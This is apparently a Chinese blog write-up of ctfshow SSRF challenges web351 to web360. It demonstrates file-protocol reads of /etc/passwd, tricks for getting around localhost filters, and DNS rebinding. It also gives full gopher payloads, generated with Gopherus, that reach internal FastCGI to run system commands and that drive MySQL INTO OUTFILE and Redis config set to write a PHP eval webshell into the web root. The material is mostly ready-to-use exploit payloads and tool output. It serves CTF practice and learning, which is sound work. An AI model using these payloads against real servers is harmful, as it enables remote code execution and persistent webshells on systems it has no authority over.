[PHP知识库]ctfshow-ssrf

前言
记录web的题目wp，慢慢变强，铸剑。

没办法数据丢失了，所以没有格式了

SSRF
SSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF 攻击的目标是从网无法访问的内部系统。（因为它是由服务端发起的，所以它能够请求到与它相关而与外部网隔离的内部系统）

web351

没有过滤，基本的ssrf漏洞，抓个包测试一下

用file协议读一下/etc/passwd试试

image-20210818201139151

因为是nginx服务，所以看看能不能读nginx配置文件，发现了fastcgi可以直接用gopher协议打通，还有根目录，试着读一下根目录的源文件，可以直接用file读取flag.php内容

image-20210818201511663

由于是第一个，所以将方法写详细一点 payload-1

file:///var/www/html/flag.php
他说得本地地址，所以可以利用http协议直接拿flag payload2

http://127.0.0.1/flag.php
还记得我们刚刚看的配置文件，127.0.0.1:9000 FastCGI漏洞，我们复现一下拿起Gopherus工具来生成payload，由于我们上面已经得到了有php的目录/var/www/html/index.php，所以可以RCE

image-20210818203141604

通过Gopherus生成payload

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
将输出的内容放到url=后面，然后这里需要再进行一次编码，因为这里curl会进行一次解码，gopher会再进行一次解码，这里直接用burp中的工具

url编码payload

gopher%3a//127.0.0.1%3a9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2502CONTENT_LENGTH58%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253A%2504%2500%253C%253Fphp%2520system%2528%2527whoami%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
成功命令执行

image-20210818203537208

接着利用RCE拿flag

payload

url=gopher%3a//127.0.0.1%3a9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2502CONTENT_LENGTH64%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2540%2504%2500%253C%253Fphp%2520system%2528%2527tac%2520flag.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
image-20210818205452483

web352

就是限制了协议的使用，只能使用http和https，preg_match没有参数，永真，所以并没有过滤什么

url=http://127.0.0.1/flag.php
web353

这回preg_match是直接过滤，这里考虑用进制绕过，实用工具里的ip地址进制转换

十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式，还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
缺省形式
url=htpp://127.1/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
web354

DNS-重定向攻击绕过可以利用CEYE工具将DNS重新绑定为127.0.0.1但是不巧，我的标识符中都带1所以被过滤了，只能找其他的了，有一个sudo.cc这个是直接重定向到127.0.0.1的，所以可以利用

1

url=http://sudo.cc/flag.php
web355

这次限制了ip地址的长度<=5，但不再过滤字符了。

1

url=http://127.1/flag.php
web356

长度限制<=3，直接用0绕过

1

url=http://0/flag.php
web357

这题多了个用gethostbyname，将我们访问的主机名对应的ip地址回显并且检验

image-20210819074544932

FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP（比如 255.255.255.255）
FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP（比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334）
FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP （比如 192.168.0.1）
FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。

简单的说，就是不能是一些私有地址，如果匹配到了RFC指定私有域地址就会返回FALSE导致无法读取flag，这里面我们就可以利用自己的域名加一个302重定向，可以找一个肉鸡试试

在主页添加一个dns.php中 这段代码

payload

url=http://www.xxx.com/dns.php //xxx是你的域名
第二种方法、如果你没有vps的话，就利用网上自带的DNS重定向DNS-CEYE注册之后

随便设置一个不再私有中的ip地址，然后再绑定一个127.0.0.1来访问本地内网

image-20210819080553394

payload，记得多试几次，因为绑定两个域名会随机绑定一起，我至少试了几十次。

url=http://r.xxx/flag.php //这是获得identity
web358

array(4) {
[“scheme”]=>
string(4) “http”
[“host”]=>
string(9) “127.0.0.1”
[“user”]=>
string(4) “ctf.”
[“path”]=>
string(9) “/flag.php”
}
image-20210819082115102

payload

url=http://ctf.@127.0.0.1/flag.php?show
web359
打开题目是个登陆框，抓包发现登陆会访问check.php，有个returl才传参，存在ssrf，提示说mysql无密码，直接拿Gopherus工具打mysql

C:\Users\23242\Desktop\悬剑武器库\tools\漏洞利用\Gopherus-master>python2 gopherus.py --exploit mysql
[32m

________ .__
/ / ____ ______ | | ___________ __ __ ______
/ \ ___ / _ \_ | | _/ __ _ __ \ | / /
\ _\ ( <> ) |> > Y \ /| | / | /_
____ /_/| /|| /_ >| |// >
/ |__| / / /

            [34mauthor: [33m$_SpyD3r_$

[0m
[31mFor making it work username should not be password protected!!![0m
[96m
Give MySQL username: [0mroot
[96mGive query to execute: [0mselect ‘<?php eval($_REQUEST[1]);?>’ into outfile ‘/var/www/html/shell.php’
[93m
Your gopher link is ready to do SSRF :
[0m
[04mgopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%00%00%00%01[0m

[41m-----------Made-by-SpyD3r-----------[0m
image-20210819083457088

和第一题一样，需要url编码一下最后拿shell

image-20210819083529138

连接蚁剑，拿flag

image-20210819083654558

web360

提示说redis，打redis是可以直接拿shell的，这题通过访问/etc/nginx/nginx.conf发现也可以打fastcgi来命令执行，但是命令执行有点慢，直接redis

利用dict看看6379端口，发现存在redis

image-20210819084633519

C:\Users\23242\Desktop\悬剑武器库\tools\漏洞利用\Gopherus-master>python2 gopherus.py --exploit redis
[32m

________ .__
/ / ____ ______ | | ___________ __ __ ______
/ \ ___ / _ \_ | | _/ __ _ __ \ | / /
\ _\ ( <> ) |> > Y \ /| | / | /_
____ /_/| /|| /_ >| |// >
/ |__| / / /

            [34mauthor: [33m$_SpyD3r_$

[0m
[01m
Ready To get SHELL
[0m
[35mWhat do you want?? (ReverseShell/PHPShell): [0mPHPShell
[96m
Give web root location of server (default is /var/www/html): [0m
[96mGive PHP Payload (We have default PHP Shell): [0m<?php eval($_REQUEST[1]);?>
[93m
Your gopher link is Ready to get PHP Shell:
[0m
[04mgopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_REQUEST%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A[0m
[01m
When it’s done you can get PHP Shell in /shell.php at the server with cmd as parmeter. [0m

[41m-----------Made-by-SpyD3r-----------[0m
image-20210819084129821

payload

url=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_REQUEST%255B1%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
image-20210819084234572